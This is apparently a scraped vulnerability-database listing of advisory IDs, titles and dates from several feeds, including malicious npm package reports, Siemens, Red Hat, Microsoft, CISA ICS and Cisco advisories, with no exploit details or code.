mal-2024-11183 Malicious code in @solana/web3.js (npm) 2024-12-03T22:45:37Z 2024-12-05T00:35:14Z
mal-2024-10909 Malicious code in lunar-root (npm) 2024-11-24T23:02:20Z 2024-12-05T00:35:14Z
mal-2024-10908 Malicious code in jigasi-haproxy-agent (npm) 2024-11-24T18:18:29Z 2024-12-05T00:35:14Z
mal-2024-10907 Malicious code in generate-release-description (npm) 2024-11-24T22:43:11Z 2024-12-05T00:35:14Z
mal-2024-10906 Malicious code in eth-based-p2p-e2e-latency (npm) 2024-11-24T20:26:35Z 2024-12-05T00:35:14Z
mal-2024-10905 Malicious code in dashlane-vscode (npm) 2024-11-24T15:55:46Z 2024-12-05T00:35:14Z
mal-2024-10904 Malicious code in d1-northwind (npm) 2024-11-24T22:07:48Z 2024-12-05T00:35:14Z
mal-2024-10903 Malicious code in clarity-vs-code-web-client (npm) 2024-11-24T23:51:51Z 2024-12-05T00:35:14Z
mal-2024-10902 Malicious code in clarity-lsp (npm) 2024-11-25T00:20:45Z 2024-12-05T00:35:14Z
mal-2024-10562 Malicious code in mongoose-4 (npm) 2024-11-08T14:24:20Z 2024-12-05T00:35:14Z
mal-2024-10560 Malicious code in immutable-axelar-bridge (npm) 2024-11-07T23:29:15Z 2024-12-05T00:35:14Z
mal-2024-10559 Malicious code in embrace-helloworld (npm) 2024-11-08T11:40:54Z 2024-12-05T00:35:14Z
mal-2024-10558 Malicious code in dancer-pipeline (npm) 2024-11-08T13:15:53Z 2024-12-05T00:35:14Z
mal-2024-10557 Malicious code in com.immutable.orderbook (npm) 2024-11-08T00:08:13Z 2024-12-05T00:35:14Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
wid-sec-w-2025-0132 Linux Kernel: Schwachstelle ermöglicht Denial of Service 2025-01-20T23:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0131 OpenSSL: Schwachstelle ermöglicht Offenlegung von Informationen 2025-01-20T23:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0130 vim: Schwachstelle ermöglicht Denial of Service 2025-01-20T23:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0129 7-Zip: Schwachstelle ermöglicht Codeausführung 2025-01-20T23:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0128 Apache CXF: Schwachstelle ermöglicht Denial of Service 2025-01-20T23:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0123 Red Hat Enterprise Linux und and OpenShift (go-git): Mehrere Schwachstellen 2025-01-19T23:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0064 Google Chrome / Microsoft Edge: Mehrere Schwachstellen 2025-01-14T23:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0038 Red Hat Enterprise Linux (iperf): Schwachstelle ermöglicht Denial of Service 2025-01-08T23:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0017 Redis: Mehrere Schwachstellen 2025-01-06T23:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-3630 Python: Schwachstelle ermöglicht Denial of Service 2024-12-08T23:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-3497 Linux Kernel: Mehrere Schwachstellen 2024-11-18T23:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-3463 Python: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen 2024-11-13T23:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-3251 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service 2024-10-21T22:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1888 Linux Kernel: Mehrere Schwachstellen 2024-08-20T22:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1812 Red Hat Enterprise Linux (389-ds-base ldap server): Schwachstelle ermöglicht Denial of Service 2024-08-11T22:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1761 libTIFF: Schwachstelle ermöglicht Denial of Service 2024-08-05T22:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1722 Linux Kernel: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff 2024-07-29T22:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1607 Linux Kernel: Mehrere Schwachstellen 2024-07-14T22:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1259 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service und unspezifischen Angriff 2024-05-30T22:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1235 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service und unspezifische Angriffe 2024-05-26T22:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1197 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service und unspezifische Angriffe 2024-05-21T22:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1188 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service 2024-05-20T22:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-0219 libTIFF: Mehrere Schwachstellen ermöglichen Denial of Service 2024-01-25T23:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2023-1613 libTIFF: Mehrere Schwachstellen 2023-06-29T22:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2023-1605 libTIFF: Schwachstelle ermöglicht Denial of Service 2023-06-29T22:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2023-1514 libTIFF: Mehrere Schwachstellen ermöglichen Denial of Service 2023-06-19T22:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2023-1479 libTIFF: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff 2023-06-14T22:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2022-1858 Red Hat Enterprise Linux (389-ds-base): Schwachstelle ermöglicht Denial of Service 2022-10-25T22:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2022-0451 Red Hat Enterprise Linux (389-ds-base): Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen 2021-08-10T22:00:00.000+00:00 2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0127 Moxa Switch: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen 2025-01-19T23:00:00.000+00:00 2025-01-19T23:00:00.000+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
ssa-097435 SSA-097435: Usernames Disclosure Vulnerability in Mendix Runtime 2024-09-10T00:00:00Z 2024-11-26T00:00:00Z
SSA-097435 SSA-097435: Usernames Disclosure Vulnerability in Mendix Runtime 2024-09-10T00:00:00Z 2024-11-26T00:00:00Z
ssa-354569 SSA-354569: Multiple Vulnerabilities in Palo Alto Networks Virtual NGFW on RUGGEDCOM APE1808 Devices 2024-11-22T00:00:00Z 2024-11-22T00:00:00Z
SSA-354569 SSA-354569: Multiple Vulnerabilities in Palo Alto Networks Virtual NGFW on RUGGEDCOM APE1808 Devices 2024-11-22T00:00:00Z 2024-11-22T00:00:00Z
ssa-824503 SSA-824503: Multiple WRL File Parsing Vulnerabilities in Tecnomatix Plant Simulation Before V2302.0018 and V2404.0007 2024-11-18T00:00:00Z 2024-11-18T00:00:00Z
SSA-824503 SSA-824503: Multiple WRL File Parsing Vulnerabilities in Tecnomatix Plant Simulation Before V2302.0018 and V2404.0007 2024-11-18T00:00:00Z 2024-11-18T00:00:00Z
ssa-472448 SSA-472448: Security Bypass Vulnerability in the SQL Client-Server Communication in Siveillance Video 2024-11-13T00:00:00Z 2024-11-13T00:00:00Z
SSA-472448 SSA-472448: Security Bypass Vulnerability in the SQL Client-Server Communication in Siveillance Video 2024-11-13T00:00:00Z 2024-11-13T00:00:00Z
ssa-962515 SSA-962515: Out of Bounds Read Vulnerability in Industrial Products 2024-05-14T00:00:00Z 2024-11-12T00:00:00Z
ssa-915275 SSA-915275: Multiple Vulnerabilities in SINEC INS Before V1.0 SP2 Update 3 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-914892 SSA-914892: Race Condition Vulnerability in Basic Authentication Implementation of Mendix Runtime 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-883918 SSA-883918: Information Disclosure Vulnerability in SIMATIC WinCC 2024-07-09T00:00:00Z 2024-11-12T00:00:00Z
ssa-876787 SSA-876787: Open Redirect Vulnerability in SIMATIC S7-1500 and S7-1200 CPUs 2024-10-08T00:00:00Z 2024-11-12T00:00:00Z
ssa-871035 SSA-871035: Session-Memory Deserialization Vulnerability in Siemens Engineering Platforms Before V19 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-773256 SSA-773256: Impact of Socket.IO CVE-2024-38355 on Siemens Industrial Products 2024-09-10T00:00:00Z 2024-11-12T00:00:00Z
ssa-723487 SSA-723487: RADIUS Protocol Susceptible to Forgery Attacks (CVE-2024-3596) - Impact to SCALANCE, RUGGEDCOM and Related Products 2024-07-09T00:00:00Z 2024-11-12T00:00:00Z
ssa-654798 SSA-654798: Incorrect Authorization Vulnerability in SIMATIC CP 1543-1 Devices 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-629254 SSA-629254: Remote Code Execution Vulnerability in SIMATIC SCADA and PCS 7 systems 2024-09-10T00:00:00Z 2024-11-12T00:00:00Z
ssa-616032 SSA-616032: Local Privilege Escalation Vulnerability in Spectrum Power 7 Before V24Q3 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-599968 SSA-599968: Denial-of-Service Vulnerability in Profinet Devices 2021-07-13T00:00:00Z 2024-11-12T00:00:00Z
ssa-454789 SSA-454789: Deserialization Vulnerability in TeleControl Server Basic V3.1 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-398330 SSA-398330: Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP V3.1 2023-12-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-364175 SSA-364175: Multiple Vulnerabilities in Palo Alto Networks Virtual NGFW on RUGGEDCOM APE1808 Devices Before V11.1.4-h1 2024-07-09T00:00:00Z 2024-11-12T00:00:00Z
ssa-354112 SSA-354112: Multiple Vulnerabilities in SCALANCE M-800 Family Before V8.2 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-351178 SSA-351178: Multiple Vulnerabilities in Solid Edge Before SE2024 Update 9 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-331112 SSA-331112: Multiple Vulnerabilities in SINEC NMS Before V3.0 SP1 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-265688 SSA-265688: Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 TM MFP V1.1 2024-04-09T00:00:00Z 2024-11-12T00:00:00Z
ssa-230445 SSA-230445: Stored XSS Vulnerability in OZW Web Servers Before V5.2 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-064257 SSA-064257: Privilege Escalation Vulnerability in SIPORT Before V3.4.0 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-054046 SSA-054046: Unauthenticated Information Disclosure in Web Server of SIMATIC S7-1500 CPUs 2024-10-08T00:00:00Z 2024-11-12T00:00:00Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
rhsa-2024:10813 Red Hat Security Advisory: OpenShift Container Platform 4.13.54 bug fix and security update 2024-12-12T02:08:06+00:00 2025-03-26T05:23:34+00:00
rhsa-2024:4118 Red Hat Security Advisory: Red Hat Ceph Storage 5.3 security, bug fix, and enhancement update 2024-06-26T10:05:24+00:00 2025-03-26T05:23:14+00:00
rhsa-2024:3927 Red Hat Security Advisory: Red Hat Ceph Storage 7.1 container image security, and bug fix update 2024-06-13T14:24:58+00:00 2025-03-26T05:23:03+00:00
rhsa-2024:10523 Red Hat Security Advisory: OpenShift Container Platform 4.14.42 bug fix and security update 2024-12-05T00:33:01+00:00 2025-03-26T05:22:50+00:00
rhsa-2025:1746 Red Hat Security Advisory: Red Hat JBoss Enterprise Application Platform 7.1.9 on RHEL 7 security update 2025-02-24T00:08:27+00:00 2025-03-26T05:22:49+00:00
rhsa-2024:1765 Red Hat Security Advisory: OpenShift Container Platform 4.14.21 bug fix and security update 2024-04-18T11:58:59+00:00 2025-03-26T05:22:49+00:00
rhsa-2025:1747 Red Hat Security Advisory: Red Hat JBoss Enterprise Application Platform 7.3.12 security update 2025-02-24T00:08:38+00:00 2025-03-26T05:22:42+00:00
rhsa-2024:0302 Red Hat Security Advisory: Kube Descheduler Operator for Red Hat OpenShift 5.0.0 for RHEL 9:security update 2024-03-06T13:33:21+00:00 2025-03-26T05:22:40+00:00
rhsa-2024:1770 Red Hat Security Advisory: OpenShift Container Platform 4.15.9 bug fix and security update 2024-04-16T14:52:58+00:00 2025-03-26T05:22:38+00:00
rhsa-2025:0832 Red Hat Security Advisory: OpenShift Container Platform 4.12.72 bug fix and security update 2025-02-06T00:45:40+00:00 2025-03-26T05:22:36+00:00
rhsa-2024:10142 Red Hat Security Advisory: OpenShift Container Platform 4.15.39 bug fix and security update 2024-11-26T11:17:01+00:00 2025-03-26T05:22:36+00:00
rhsa-2025:0014 Red Hat Security Advisory: OpenShift Container Platform 4.12.71 bug fix and security update 2025-01-09T02:15:46+00:00 2025-03-26T05:22:29+00:00
rhsa-2024:0766 Red Hat Security Advisory: OpenShift Container Platform 4.15.0 security update 2024-02-28T08:10:56+00:00 2025-03-26T05:22:29+00:00
rhsa-2024:1572 Red Hat Security Advisory: OpenShift Container Platform 4.12.54 bug fix and security update 2024-04-03T06:57:46+00:00 2025-03-26T05:22:24+00:00
rhsa-2024:1037 Red Hat Security Advisory: OpenShift Container Platform 4.13.36 bug fix and security update 2024-03-06T14:46:43+00:00 2025-03-26T05:22:24+00:00
rhsa-2024:6755 Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.16.2 security and bug fix update 2024-09-18T11:56:25+00:00 2025-03-26T05:22:18+00:00
rhsa-2024:0741 Red Hat Security Advisory: OpenShift Container Platform 4.13.33 bug fix and security update 2024-02-14T06:34:01+00:00 2025-03-26T05:22:15+00:00
rhsa-2024:1052 Red Hat Security Advisory: OpenShift Container Platform 4.12.51 bug fix and security update 2024-03-06T00:38:22+00:00 2025-03-26T05:22:12+00:00
rhsa-2024:1464 Red Hat Security Advisory: OpenShift Container Platform 4.11.59 bug fix and security update 2024-03-27T19:51:20+00:00 2025-03-26T05:22:10+00:00
rhsa-2024:4631 Red Hat Security Advisory: Red Hat OpenShift Dev Spaces 3.15.0 release 2024-07-18T17:11:22+00:00 2025-03-26T05:22:07+00:00
rhsa-2024:0269 Red Hat Security Advisory: Run Once Duration Override Operator for Red Hat OpenShift 1.1.0 for RHEL 9 2024-02-28T00:20:04+00:00 2025-03-26T05:22:06+00:00
rhsa-2024:1449 Red Hat Security Advisory: OpenShift Container Platform 4.15.5 bug fix and security update 2024-03-27T11:18:26+00:00 2025-03-26T05:21:59+00:00
rhsa-2024:0946 Red Hat Security Advisory: OpenShift Container Platform 4.13.35 security update 2024-02-28T14:03:56+00:00 2025-03-26T05:21:59+00:00
rhsa-2024:0682 Red Hat Security Advisory: OpenShift Container Platform 4.11.58 bug fix and security update 2024-02-08T18:42:42+00:00 2025-03-26T05:21:59+00:00
rhsa-2024:0290 Red Hat Security Advisory: OpenShift Container Platform 4.14.10 bug fix and security update 2024-01-23T20:26:08+00:00 2025-03-26T05:21:52+00:00
rhsa-2024:0941 Red Hat Security Advisory: OpenShift Container Platform 4.14.14 bug fix and security update 2024-02-28T00:21:13+00:00 2025-03-26T05:21:48+00:00
rhsa-2024:1458 Red Hat Security Advisory: OpenShift Container Platform 4.14.18 bug fix and security update 2024-03-27T00:25:36+00:00 2025-03-26T05:21:47+00:00
rhsa-2024:0664 Red Hat Security Advisory: OpenShift Container Platform 4.12.49 bug fix update and security update 2024-02-08T19:31:18+00:00 2025-03-26T05:21:45+00:00
rhsa-2024:0198 Red Hat Security Advisory: OpenShift Container Platform 4.12.47 security update 2024-01-17T18:20:55+00:00 2025-03-26T05:21:39+00:00
rhsa-2024:1454 Red Hat Security Advisory: OpenShift Container Platform 4.13.38 bug fix and security update 2024-03-27T00:32:17+00:00 2025-03-26T05:21:37+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
msrc_cve-2025-21385 Microsoft Purview Information Disclosure Vulnerability 2025-01-09T08:00:00.000Z 2025-01-09T08:00:00.000Z
msrc_cve-2025-21380 Azure Marketplace SaaS Resources Information Disclosure Vulnerability 2025-01-09T08:00:00.000Z 2025-01-09T08:00:00.000Z
msrc_cve-2024-43594 Microsoft System Center Elevation of Privilege Vulnerability 2024-12-10T08:00:00.000Z 2025-01-07T08:00:00.000Z
msrc_cve-2024-49051 Microsoft PC Manager Elevation of Privilege Vulnerability 2024-11-12T08:00:00.000Z 2024-12-31T08:00:00.000Z
msrc_cve-2024-43601 Visual Studio Code for Linux Remote Code Execution Vulnerability 2024-10-08T07:00:00.000Z 2024-12-27T08:00:00.000Z
msrc_cve-2024-43600 Microsoft Office Elevation of Privilege Vulnerability 2024-12-10T08:00:00.000Z 2024-12-23T08:00:00.000Z
msrc_cve-2013-3900 WinVerifyTrust Signature Validation Vulnerability 2022-01-11T08:00:00.000Z 2024-12-23T08:00:00.000Z
msrc_cve-2024-49128 Windows Remote Desktop Services Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-16T08:00:00.000Z
msrc_cve-2024-49116 Windows Remote Desktop Services Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-16T08:00:00.000Z
msrc_cve-2024-49147 Microsoft Update Catalog Elevation of Privilege Vulnerability 2024-12-10T08:00:00.000Z 2024-12-12T08:00:00.000Z
msrc_cve-2024-49071 Windows Defender Information Disclosure Vulnerability 2024-12-10T08:00:00.000Z 2024-12-12T08:00:00.000Z
msrc_cve-2024-49069 Microsoft Excel Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-12T08:00:00.000Z
msrc_cve-2024-43451 NTLM Hash Disclosure Spoofing Vulnerability 2024-11-12T08:00:00.000Z 2024-12-12T08:00:00.000Z
msrc_cve-2024-38183 GroupMe Elevation of Privilege Vulnerability 2024-09-10T07:00:00.000Z 2024-12-12T08:00:00.000Z
msrc_cve-2024-49112 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-11T08:00:00.000Z
msrc_cve-2024-49142 Microsoft Access Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49138 Windows Common Log File System Driver Elevation of Privilege Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49132 Windows Remote Desktop Services Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49129 Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49127 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49126 Windows Local Security Authority Subsystem Service (LSASS) Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49125 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49124 Lightweight Directory Access Protocol (LDAP) Client Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49123 Windows Remote Desktop Services Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49122 Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49121 Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49120 Windows Remote Desktop Services Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49119 Windows Remote Desktop Services Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49118 Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
msrc_cve-2024-49117 Windows Hyper-V Remote Code Execution Vulnerability 2024-12-10T08:00:00.000Z 2024-12-10T08:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
icsa-24-338-06 Fuji Electric Tellus Lite V-Simulator 2024-12-03T07:00:00.000000Z 2024-12-03T07:00:00.000000Z
icsa-24-338-05 Fuji Electric Monitouch V-SFT 2024-12-03T07:00:00.000000Z 2024-12-03T07:00:00.000000Z
icsa-24-338-04 ICONICS and Mitsubishi Electric Products 2024-12-03T07:00:00.000000Z 2024-12-03T07:00:00.000000Z
icsa-24-338-03 Open Automation Software 2024-12-03T07:00:00.000000Z 2024-12-03T07:00:00.000000Z
icsa-24-338-01 Ruijie Reyee OS 2024-12-03T07:00:00.000000Z 2024-12-03T07:00:00.000000Z
icsa-24-184-03 ICONICS and Mitsubishi Electric Products (Update A) 2024-07-02T06:00:00.000000Z 2024-12-03T07:00:00.000000Z
icsa-22-307-01 ETIC Telecom Remote Access Server (RAS) (Update B) 2022-11-03T06:00:00.000000Z 2024-12-03T07:00:00.000000Z
ICSA-24-338-06 Fuji Electric Tellus Lite V-Simulator 2024-12-03T07:00:00.000000Z 2024-12-03T07:00:00.000000Z
ICSA-24-338-05 Fuji Electric Monitouch V-SFT 2024-12-03T07:00:00.000000Z 2024-12-03T07:00:00.000000Z
ICSA-24-338-04 ICONICS and Mitsubishi Electric Products 2024-12-03T07:00:00.000000Z 2024-12-03T07:00:00.000000Z
ICSA-24-338-03 Open Automation Software 2024-12-03T07:00:00.000000Z 2024-12-03T07:00:00.000000Z
ICSA-24-338-01 Ruijie Reyee OS 2024-12-03T07:00:00.000000Z 2024-12-03T07:00:00.000000Z
ICSA-24-184-03 ICONICS and Mitsubishi Electric Products (Update A) 2024-07-02T06:00:00.000000Z 2024-12-03T07:00:00.000000Z
ICSA-22-307-01 ETIC Telecom Remote Access Server (RAS) (Update B) 2022-11-03T06:00:00.000000Z 2024-12-03T07:00:00.000000Z
va-24-254-02 TopQuadrant TopBraid EDG Insecure External Password Storage and XXE Vulnerabilities 2024-09-10T16:03:00Z 2024-11-28T01:00:00Z
VA-24-254-02 TopQuadrant TopBraid EDG Insecure External Password Storage and XXE Vulnerabilities 2024-09-10T16:03:00Z 2024-11-28T01:00:00Z
va-24-331-01 Valor Apps Easy Folder Listing Pro Joomla! extension deserialization vulnerability 2024-11-26T18:15:49Z 2024-11-26T18:15:49Z
VA-24-331-01 Valor Apps Easy Folder Listing Pro Joomla! extension deserialization vulnerability 2024-11-26T18:15:49Z 2024-11-26T18:15:49Z
icsa-24-256-05 Siemens Mendix Runtime 2024-09-10T00:00:00.000000Z 2024-11-26T00:00:00.000000Z
ICSA-24-256-05 Siemens Mendix Runtime 2024-09-10T00:00:00.000000Z 2024-11-26T00:00:00.000000Z
icsa-24-338-02 Siemens RUGGEDCOM APE1808 2024-11-22T00:00:00.000000Z 2024-11-22T00:00:00.000000Z
ICSA-24-338-02 Siemens RUGGEDCOM APE1808 2024-11-22T00:00:00.000000Z 2024-11-22T00:00:00.000000Z
icsma-24-200-01 Philips Vue PACS (Update A) 2024-07-18T06:00:00.000000Z 2024-11-21T07:00:00.000000Z
icsa-24-326-07 mySCADA myPRO Manager 2024-11-21T07:00:00.000000Z 2024-11-21T07:00:00.000000Z
icsa-24-326-02 OSCAT Basic Library 2024-11-21T07:00:00.000000Z 2024-11-21T07:00:00.000000Z
icsa-24-326-01 Automated Logic WebCTRL Premium Server 2024-11-21T07:00:00.000000Z 2024-11-21T07:00:00.000000Z
ICSMA-24-200-01 Philips Vue PACS (Update A) 2024-07-18T06:00:00.000000Z 2024-11-21T07:00:00.000000Z
ICSA-24-326-07 mySCADA myPRO Manager 2024-11-21T07:00:00.000000Z 2024-11-21T07:00:00.000000Z
ICSA-24-326-02 OSCAT Basic Library 2024-11-21T07:00:00.000000Z 2024-11-21T07:00:00.000000Z
ICSA-24-326-01 Automated Logic WebCTRL Premium Server 2024-11-21T07:00:00.000000Z 2024-11-21T07:00:00.000000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
cisco-sa-xrike-9wygprgq Cisco IOS XR Software Internet Key Exchange Version 2 Denial of Service Vulnerability 2025-03-12T16:00:00+00:00 2025-03-12T16:00:00+00:00
cisco-sa-sb-lkm-znerzjbz Cisco IOS XR Software Secure Boot Bypass Vulnerability 2025-03-12T16:00:00+00:00 2025-03-12T16:00:00+00:00
cisco-sa-ncs-hybridacl-crmzffkq Cisco IOS XR Software Hybrid Access Control List Bypass Vulnerability 2025-03-12T16:00:00+00:00 2025-03-12T16:00:00+00:00
cisco-sa-modular-acl-u5mepxmm Cisco IOS XR Software Access Control List Bypass Vulnerability 2025-03-12T16:00:00+00:00 2025-03-12T16:00:00+00:00
cisco-sa-iosxr-priv-esc-gfqjxvof Cisco IOS XR Software CLI Privilege Escalation Vulnerability 2025-03-12T16:00:00+00:00 2025-03-12T16:00:00+00:00
cisco-sa-iosxr-bgp-dos-o7stephx Cisco IOS XR Software Border Gateway Protocol Confederation Denial of Service Vulnerability 2025-03-12T16:00:00+00:00 2025-03-12T16:00:00+00:00
cisco-sa-ios-xr-verii-bypass-hhpwqrvx Cisco IOS XR Software Image Verification Bypass Vulnerability 2025-03-12T16:00:00+00:00 2025-03-12T16:00:00+00:00
cisco-sa-snmp-dos-sdxnsucw Cisco IOS, IOS XE, and IOS XR Software SNMP Denial of Service Vulnerabilities 2025-02-05T16:00:00+00:00 2025-03-12T15:22:33+00:00
cisco-sa-tms-xss-vuln-wbtcywxg Cisco TelePresence Management Suite Cross-Site Scripting Vulnerability 2025-03-05T16:00:00+00:00 2025-03-05T16:00:00+00:00
cisco-sa-webex-credexp-xmn85y6 Cisco Webex for BroadWorks Credential Exposure Vulnerability 2025-03-04T16:00:00+00:00 2025-03-04T16:00:00+00:00
cisco-sa-nxos-ici-dpojbwxk Cisco Nexus 3000 and 9000 Series Switches Command Injection Vulnerability 2025-02-26T16:00:00+00:00 2025-02-26T16:00:00+00:00
cisco-sa-n3kn9k-healthdos-eoqswk4g Cisco Nexus 3000 and 9000 Series Switches Health Monitoring Diagnostics Denial of Service Vulnerability 2025-02-26T16:00:00+00:00 2025-02-26T16:00:00+00:00
cisco-sa-apic-multi-vulns-9ummtg5 Cisco Application Policy Infrastructure Controller Vulnerabilities 2025-02-26T16:00:00+00:00 2025-02-26T16:00:00+00:00
cisco-sa-phone-info-disc-yyxswstk Cisco Video Phone 8875 and Desk Phone 9800 Series Information Disclosure Vulnerability 2025-02-19T16:00:00+00:00 2025-02-19T16:00:00+00:00
cisco-sa-esa-mailpol-bypass-5nvcjzmw Cisco Secure Email Gateway Email Filter Bypass Vulnerability 2025-02-19T16:00:00+00:00 2025-02-19T16:00:00+00:00
cisco-sa-broadworks-xss-gdpgj58p Cisco BroadWorks Application Delivery Platform Cross-Site Scripting Vulnerability 2025-02-19T16:00:00+00:00 2025-02-19T16:00:00+00:00
cisco-sa-ise-multivuls-ftw9aoxf Cisco Identity Services Engine Insecure Java Deserialization and Authorization Bypass Vulnerabilities 2025-02-05T16:00:00+00:00 2025-02-10T20:23:50+00:00
cisco-sa-esa-sma-wsa-multi-ykujhs34 Cisco Secure Email and Web Manager, Secure Email Gateway, and Secure Web Appliance Vulnerabilities 2025-02-05T16:00:00+00:00 2025-02-07T19:21:57+00:00
cisco-sa-nxos-image-sig-bypas-pqdrqvjl Cisco NX-OS Software Image Verification Bypass Vulnerability 2024-12-04T16:00:00+00:00 2025-02-06T22:36:09+00:00
cisco-sa-swa-range-bypass-2bsehysu Cisco Secure Web Appliance Range Request Bypass Vulnerability 2025-02-05T16:00:00+00:00 2025-02-05T16:00:00+00:00
cisco-sa-ise-xss-42tgsdmg Cisco Identity Services Engine Stored Cross-Site Scripting Vulnerabilities 2025-02-05T16:00:00+00:00 2025-02-05T16:00:00+00:00
cisco-sa-expressway-xss-uexuzrew Cisco Expressway Series Cross-Site Scripting Vulnerability 2025-02-05T16:00:00+00:00 2025-02-05T16:00:00+00:00
cisco-sa-esa-sma-xss-wck2wcug Cisco Secure Email and Web Manager and Secure Email Gateway Cross-Site Scripting Vulnerability 2025-02-05T16:00:00+00:00 2025-02-05T16:00:00+00:00
cisco-sa-esa-sma-wsa-snmp-inf-fqpvl8sx Cisco Secure Email and Web Manager, Secure Email Gateway, and Secure Web Appliance SNMP Polling Information Disclosure Vulnerability 2025-02-05T16:00:00+00:00 2025-02-05T16:00:00+00:00
cisco-sa-cmm-privesc-uy2vf8pc Cisco Meeting Management REST API Privilege Escalation Vulnerability 2025-01-22T16:00:00+00:00 2025-01-22T16:00:00+00:00
